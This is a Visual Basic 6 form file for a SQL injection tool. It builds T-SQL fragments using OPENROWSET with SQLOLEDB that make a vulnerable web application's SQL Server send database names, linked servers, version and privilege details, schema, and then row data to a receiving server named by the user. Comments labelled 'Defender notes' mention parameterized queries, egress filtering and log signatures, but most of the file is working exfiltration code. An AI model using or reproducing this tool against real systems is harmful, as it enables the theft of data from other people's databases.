📄 main.frm
Height = 2010
Left = 1605
TabIndex = 9
Top = 375
Width = 1590
End
Begin VB.ListBox LstLinkedServer
Height = 2010
Left = 135
TabIndex = 8
Top = 375
Width = 1395
End
Begin VB.CommandButton CmdListFields
Caption = "List Fields>>"
Height = 390
Left = 6360
TabIndex = 13
Top = 615
Width = 1140
End
Begin VB.CommandButton CmdListTables
Caption = "List Tables>>"
Height = 390
Left = 3285
TabIndex = 11
Top = 615
Width = 1140
End
Begin VB.Label Label9
AutoSize = -1 'True
Caption = "Fields :"
Height = 195
Left = 7485
TabIndex = 29
Top = 150
Width = 495
End
Begin VB.Label Label8
AutoSize = -1 'True
Caption = "Tables :"
Height = 195
Left = 4515
TabIndex = 28
Top = 165
Width = 570
End
Begin VB.Label Label7
AutoSize = -1 'True
Caption = "Databases :"
Height = 195
Left = 1710
TabIndex = 27
Top = 150
Width = 855
End
Begin VB.Label Label6
AutoSize = -1 'True
Caption = "Linked Servers :"
Height = 195
Left = 195
TabIndex = 26
Top = 135
Width = 1155
End
End
Begin VB.Label Label11
AutoSize = -1 'True
Caption = "Results :"
Height = 195
Left = 120
TabIndex = 32
Top = 5160
Width = 615
End
End
Attribute VB_Name = "FrmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
' Request settings shared by the event handlers in this form. SetVars copies
' them from TxtUrl, TxtPostData and CboMethod before each SubmitInjection call.
Dim Url As String
Dim PostData As String
Dim Method As String
' Toggles the post-data text box when the HTTP method selection changes.
' The box is enabled for every ListIndex other than 0 (the original tested the
' index for truthiness, so -1 / "no selection" also enables it).
Private Sub CboMethod_Click()
    TxtPostData.Enabled = (CboMethod.ListIndex <> 0)
End Sub
' Click handler for the Go button: validates the form, then runs the initial
' enumeration pass (database names, linked-server names, version/identity banner).
'
' Each *_INJECTION_STR is a T-SQL fragment assembled from the form fields. It
' uses OPENROWSET with the SQLOLEDB provider over TCP (Network=DBMSSOCN) so that
' the rows of the trailing SELECT are inserted into a global temp table on the
' SQL Server named by TxtServer/TxtPort. The closing "--" comments out whatever
' follows the fragment in the statement it ends up in.
' SubmitInjection is defined outside this view; presumably it attaches the
' fragment to the request described by Url/Method/PostData - confirm there.
'
' Defender notes:
' - The fragment only has an effect where an application concatenates request
'   input into SQL; parameterized queries remove that precondition.
' - It also needs ad hoc OPENROWSET access on the database server and an
'   outbound TCP path from the database host to the receiving server. Disabling
'   ad hoc distributed queries and filtering egress from database hosts each
'   break the data path independently.
' - The receiving server's address, port, login and password are embedded in
'   clear text in every fragment, so wherever the request is logged they are
'   recoverable during incident response. The literals "openrowset", "sqloledb"
'   and "DBMSSOCN" in request parameters are distinctive search terms.
Private Sub CmdGo_Click()
Dim DATABASES_INJECTION_STR As String
Dim SERVERS_INJECTION_STR As String
Dim VERSION_INJECTION_STR As String
' Any runtime error below is reported in a message box by DisplayError.
On Error GoTo DisplayError
' A URL is mandatory; post data is mandatory only when the method is POST.
If TxtUrl.Text <> "" Then
If (CboMethod.Text = "POST" And TxtPostData.Text <> "") Or (CboMethod.Text = "GET") Then
' Database names from master.dbo.sysdatabases, sent to ##databases.
DATABASES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##databases') select name from master.dbo.sysdatabases--"
' Linked-server names from master.dbo.sysservers, sent to ##servers.
SERVERS_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##servers') select srvname from master.dbo.sysservers--"
' Version banner plus login name, user name and db_owner / sysadmin membership,
' sent to ##version. %2B is the URL-encoded form of "+", the T-SQL string
' concatenation operator.
VERSION_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##version') select @@VERSION union all select 'Login name: ' %2B suser_sname() %2B char(13) %2B 'User name: ' %2B user %2B char(13) %2B 'Is db_owner: ' %2B convert(varchar(1),IS_MEMBER ('db_owner') ) %2B char(13) %2B 'Is sysadmin: ' %2B convert(varchar(1),IS_SRVROLEMEMBER('sysadmin')) --"
ClearLists
' Connect and CreateTables are defined elsewhere; presumably they open a session
' to the receiving server and create the ## temp tables there - TODO confirm.
Connect TxtServer.Text, TxtLogin.Text, TxtPassword.Text, TxtPort.Text
CreateTables
' SetVars re-reads Url/PostData/Method from the form before every submission.
SetVars
SubmitInjection Url, Method, PostData, DATABASES_INJECTION_STR
SetVars
SubmitInjection Url, Method, PostData, SERVERS_INJECTION_STR
SetVars
SubmitInjection Url, Method, PostData, VERSION_INJECTION_STR
' Defined elsewhere; presumably these read the temp tables back into the form.
GetVersion
GetServers
GetDatabases
Else
MsgBox "Please, Input the post data value"
End If
Else
MsgBox "Please, Input the url value"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
' Click handler for "List Fields>>": requests the column names of the table
' selected in LstTables (in the database selected in LstDatabases).
'
' The fragment has the same OPENROWSET shape as the other handlers in this
' form: rows of the trailing SELECT over <db>.dbo.syscolumns are inserted into
' ##fields on the server named by TxtServer/TxtPort. Database and table names
' are concatenated straight from the list boxes.
' Defender note: a request parameter that references syscolumns together with
' object_id(...) and openrowset(...) is schema enumeration, not normal
' application traffic, and is worth alerting on in web or database logs.
Private Sub CmdListFields_Click()
Dim FIELDS_INJECTION_STR As String
' Any runtime error below is reported in a message box by DisplayError.
On Error GoTo DisplayError
' Acts as the "a table is selected" guard: the selected entry must be non-empty.
If LstTables.List(LstTables.ListIndex) <> "" Then
FIELDS_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##fields') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.syscolumns where id=object_id('" + LstDatabases.List(LstDatabases.ListIndex) + ".." + LstTables.List(LstTables.ListIndex) + "')--"
SetVars
' Reset the query box to its empty prefix; LstFields_ItemCheck appends to it.
TxtQuery.Text = "Select "
SubmitInjection Url, Method, PostData, FIELDS_INJECTION_STR
' Defined elsewhere; presumably fills LstFields from ##fields - TODO confirm.
GetFields
Else
MsgBox "Please, Select a table"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
' Click handler for "List Tables>>": requests the table names of the database
' selected in LstDatabases.
'
' Both branches build the same OPENROWSET fragment over <db>.dbo.sysobjects and
' differ only in the filter: xtype='U' (user tables) alone, or xtype='U' or
' xtype='S' (user and system tables) when ChkSysTables is ticked. Rows go to
' ##tables on the server named by TxtServer/TxtPort.
' Defender note: reads of sysobjects arriving through a web request parameter,
' combined with openrowset(...), indicate schema enumeration; the account the
' application uses to reach the database should not need ad hoc OPENROWSET.
Private Sub CmdListTables_Click()
Dim TABLES_INJECTION_STR As String
' Any runtime error below is reported in a message box by DisplayError.
On Error GoTo DisplayError
' Acts as the "a database is selected" guard: the selected entry must be non-empty.
If LstDatabases.List(LstDatabases.ListIndex) <> "" Then
' ChkSysTables is evaluated through its default property.
If ChkSysTables Then
TABLES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tables') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.sysobjects where xtype='U' or xtype='S'--"
Else
TABLES_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tables') select name from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo.sysobjects where xtype='U'--"
End If
SetVars
' A new table list invalidates the field list and any query built from it.
LstFields.Clear
TxtQuery.Text = "Select "
SubmitInjection Url, Method, PostData, TABLES_INJECTION_STR
' Defined elsewhere; presumably fills LstTables from ##tables - TODO confirm.
GetTables
Else
MsgBox "Please, Select a Database"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
' Click handler for the run-query button: requests up to TxtMaxRows rows of the
' fields ticked in LstFields from the selected database and table.
'
' TxtQuery holds "Select " followed by comma-terminated field names (maintained
' by LstFields_ItemCheck). The handler strips the trailing character and the
' "Select " prefix to get the bare field list, builds "Select top N ... from
' <db>.dbo.<table>", and wraps it in the same OPENROWSET fragment used by the
' other handlers, targeting ##tableresults on the server named by
' TxtServer/TxtPort.
' Defender note: this is the step that moves row data, as opposed to metadata,
' off the database host. It depends on the database server being able to open
' an outbound connection to an arbitrary address and port, so egress filtering
' on database hosts and alerting on unexpected outbound SQL Server sessions
' are the relevant controls.
Private Sub CmdRunQuery_Click()
Dim Fields As String
Dim Query As String
Dim QUERY_INJECTION_STR As String
' Any runtime error below is reported in a message box by DisplayError.
On Error GoTo DisplayError
' "Select " alone means no field has been ticked yet.
If TxtQuery.Text <> "Select " Then
SetVars
' Drop the last character of the query text (the trailing comma), then the prefix.
Fields = Left(TxtQuery.Text, Len(TxtQuery) - 1)
Fields = Replace(Fields, "Select ", "")
Query = "Select top " + TxtMaxRows.Text + " " + Fields + " from " + LstDatabases.List(LstDatabases.ListIndex) + ".dbo." + LstTables.List(LstTables.ListIndex)
' Defined elsewhere; presumably creates ##tableresults with one column per
' selected field - TODO confirm.
CreateTableResults Fields
QUERY_INJECTION_STR = " insert into openrowset('sqloledb','Network=DBMSSOCN;Address=" + TxtServer.Text + "," + TxtPort.Text + ";uid=" + TxtLogin.Text + ";pwd=" + TxtPassword.Text + "','select * from ##tableresults')" + Query + "--"
SubmitInjection Url, Method, PostData, QUERY_INJECTION_STR
' Defined elsewhere; presumably displays the rows of ##tableresults.
GetResults
Else
MsgBox "Please, Select One or More Fields"
End If
Exit Sub
DisplayError:
MsgBox Err.Description
End Sub
' Selects the first entry of the method combo box when the form loads.
' NOTE(review): entry 0 is presumably GET, since CboMethod_Click leaves the
' post-data box disabled for index 0 - confirm against the combo's List data.
Private Sub Form_Load()
    With CboMethod
        .ListIndex = 0
    End With
End Sub
' Closes the session and terminates the program when the form is unloaded.
' Disconnect is defined elsewhere in the project. Cancel is not modified.
Private Sub Form_Unload(Cancel As Integer)
    On Error GoTo DisplayError

    Call Disconnect
    ' End stops the program immediately, so the Exit Sub below is only a guard
    ' against falling through into the error handler.
    End
    Exit Sub

DisplayError:
    Call MsgBox(Err.Description)
End Sub
' Keeps TxtQuery in step with the check boxes in LstFields.
' Ticking an item appends "<field>," to the query text; unticking removes that
' text again. If the query text already contains " from", the
' " from <db>.dbo.<table>" suffix is stripped and a comma appended first.
Private Sub LstFields_ItemCheck(Item As Integer)
    Dim FromClause As String
    Dim FieldEntry As String
    Dim IsChecked As Boolean

    On Error GoTo DisplayError

    If InStr(1, TxtQuery.Text, " from", vbTextCompare) <> 0 Then
        FromClause = " from " & LstDatabases.List(LstDatabases.ListIndex) & ".dbo." & LstTables.List(LstTables.ListIndex)
        TxtQuery.Text = Replace(TxtQuery.Text, FromClause, "")
        TxtQuery.Text = TxtQuery.Text & ","
    End If

    IsChecked = LstFields.Selected(Item)
    FieldEntry = LstFields.List(Item) & ","

    If IsChecked Then
        TxtQuery.Text = TxtQuery.Text & FieldEntry
    Else
        TxtQuery.Text = Replace(TxtQuery.Text, FieldEntry, "")
    End If
    Exit Sub

DisplayError:
    Call MsgBox(Err.Description)
End Sub
' Empties the four result list boxes (linked servers, databases, tables,
' fields) in that order.
Private Sub ClearLists()
    Dim Lst As Variant

    For Each Lst In Array(LstLinkedServer, LstDatabases, LstTables, LstFields)
        Lst.Clear
    Next Lst
End Sub
' Copies the current request settings from the form controls into the
' module-level Url, PostData and Method variables.
Private Sub SetVars()
    Method = Me.CboMethod.Text
    PostData = Me.TxtPostData.Text
    Url = Me.TxtUrl.Text
End Sub
' Keystroke filter for the max-rows box: Backspace (code 8) and any character
' IsNumeric accepts pass through; every other key is cancelled by zeroing
' KeyAscii. Only typed keys are filtered here.
Private Sub TxtMaxRows_KeyPress(KeyAscii As Integer)
    Dim TypedIsNumeric As Boolean

    TypedIsNumeric = IsNumeric(Chr(KeyAscii))
    If KeyAscii = vbKeyBack Then Exit Sub
    If TypedIsNumeric Then Exit Sub

    KeyAscii = 0
End Sub
' Keystroke filter for the port box: Backspace (code 8) and any character
' IsNumeric accepts pass through; every other key is cancelled by zeroing
' KeyAscii. Only typed keys are filtered here.
Private Sub TxtPort_KeyPress(KeyAscii As Integer)
    Dim TypedIsNumeric As Boolean

    TypedIsNumeric = IsNumeric(Chr(KeyAscii))
    If KeyAscii = vbKeyBack Then Exit Sub
    If TypedIsNumeric Then Exit Sub

    KeyAscii = 0
End Sub